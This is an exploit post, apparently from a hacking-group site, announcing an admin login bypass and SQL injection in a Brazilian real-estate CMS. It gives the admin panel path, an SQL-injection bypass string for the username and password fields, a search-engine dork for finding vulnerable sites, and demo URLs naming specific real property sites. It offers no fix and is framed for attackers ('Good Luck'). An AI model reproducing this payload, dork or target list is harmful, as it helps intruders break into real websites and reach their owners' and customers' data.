facebook facebook twitter rss

Brazil CMS admin Bypass and SQL Injection Vulnerability

Author: Rednofozi , Published: 01-10-2018
 ,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

====================================================================================
# Exploit Title: Brazil CMS admin Bypass and SQL Injection Vulnerability
# Exploit Author: Rednofozi
# Date:29-09-2018
# Email: Rednofozi@yahoo.com
# Vendor Homepage: www.hamilimoveis.com.br
# OUR SITE : https://anonysec.org/
|====================================================================================
# {INFO}
# Page Admin :
site.br/adm
Bypass
User & Pass :

'=' 'or'
|====================================================================================
# {DORK}
# " inurl:detalhes_imovel.php?Cod= site:br'
|====================================================================================
|====================================================================================
# {DEMO}
# 01: http://www.ubatubaceliolocacoes.com/detalhes_imovel.php?Cod=41
# 02: http://www.imoveismanduri.com.br/detalhes_imovel.php?Cod=71
# 03: http://www.hamilimoveis.com.br/detalhes_imovel.php?Cod=137
# 04: admin bypass and SQL Injection
# 05
# 06:
# 07:
# 08:
# 09:
# 10:
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck :D:D:D

Like us on Facebook :